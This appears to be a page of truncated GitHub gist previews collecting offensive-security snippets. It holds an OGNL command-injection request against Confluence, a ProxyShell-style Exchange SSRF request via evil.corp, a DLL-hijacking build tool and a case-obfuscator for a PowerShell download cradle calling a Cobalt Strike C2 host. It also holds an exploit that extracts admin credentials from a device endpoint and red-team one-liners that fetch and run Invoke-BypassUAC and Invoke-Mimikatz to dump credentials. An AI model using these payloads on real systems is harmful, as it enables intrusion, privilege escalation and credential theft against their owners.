This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 | |
Host: local.confluence | |
User-Agent: curl/7.68.0 | |
Accept: */* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-16"?> | |
<Answers Version="1.0"> | |
<Interaction ID="IT_RebrowseForFile"> | |
<Value>?</Value> | |
</Interaction> | |
<Interaction ID="IT_LaunchMethod"> | |
<Value>ContextMenu</Value> | |
</Interaction> | |
<Interaction ID="IT_SelectProgram"> | |
<Value>NotListed</Value> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
usage(){ | |
echo "# ################# Simple CPP to DLL Utility ################# #" | |
echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#" | |
echo "# #" | |
echo "# ========================================================================================== #" | |
echo "# #" | |
echo "# Usage: #" | |
echo "# ./dll-gcc [Options] <input-file> #" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /autodiscover/autodiscover.json?@evil.corp/EWS/Exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp HTTP/2 | |
Host: localhost | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 | |
Accept: */* | |
Content-Type: text/xml | |
<?xml version="1.0" encoding="utf-8"?> | |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" | |
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
def cmd(string): | |
for _ in string: | |
_ = _.replace("'", '\"') | |
_ = _.replace('"', '\"') | |
s = random.choice(["'"+_.lower()+"'+", "'"+_.upper()+"'+"]).replace(")'+", ")'") | |
print(s, end='') | |
cmd("powershell.exe nop -wind hidden -Exec Bypass -noni -enc -C IeX (NeW-OBjeCt Net.WeBClIeNt).DownloadString('hxxp://c2.cobaltstrike.com/Malicious')") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /api/Action/TestAction HTTP/1.1 | |
Host: <target> | |
Content-Length: 3978 | |
Accept: application/json, text/javascript, */*; q=0.01 | |
X-XSRF-TOKEN: <token> | |
X-Requested-With: XMLHttpRequest | |
ViewLimitationID: 0 | |
User-Agent: Mozilla/5.0 | |
Content-Type: application/json; charset=UTF-8 | |
Cookie: <cookie> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
import sys | |
def exploit(url): | |
vuln = url + '/config/getuser?index=0' | |
r = requests.get(vuln, verify=False, timeout=5) | |
if r.status_code == 200 and 'priv=1' in r.text: | |
user = r.text.split('name=')[1].split('\r\npass')[0] | |
pwd = r.text.split('\r\npass=')[1].split('\r\npriv')[0] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |